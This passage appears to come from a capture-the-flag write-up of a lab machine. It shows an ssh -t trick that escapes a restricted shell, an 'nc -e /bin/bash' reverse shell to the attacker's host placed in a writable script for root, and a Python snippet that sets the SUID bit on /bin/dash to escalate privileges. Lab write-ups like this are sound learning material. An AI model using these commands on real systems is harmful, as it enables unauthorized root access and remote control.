when I first logged in, it had a restricted shell so I used the trick below.
ssh mindy@10.129.29.189 -t "bash --noprofile"
According to the ssh manual page,
-t Force pseudo-terminal allocation. This can be used to exe‐
cute arbitrary screen-based programs on a remote machine,
which can be very useful, e.g. when implementing menu ser‐
vices. Multiple -t options force tty allocation, even if
ssh has no local tty.
now I can see other files.
let's see if we can connect via nc -e /bin/bash 10.10.14.131 1234
it worked!
Let's plug this in in the tmp.py
I waited for a min, and I got a root shell!
Another way to get the root:
#!/usr/bin/env python
import os
import sys
try:
os.system("chmod 4755 /bin/dash")
except:
sys.exit()
#4 -> setuid bit 755 default perm for most binary
dash -> another terminal. doesn't strip the setuid bit like bash doesn't.
so if we can set the SUID bit separately and execute it, then we can escalate privilege.
type "dash" to call the executable once the permission is confirmed to be changed to -rwsr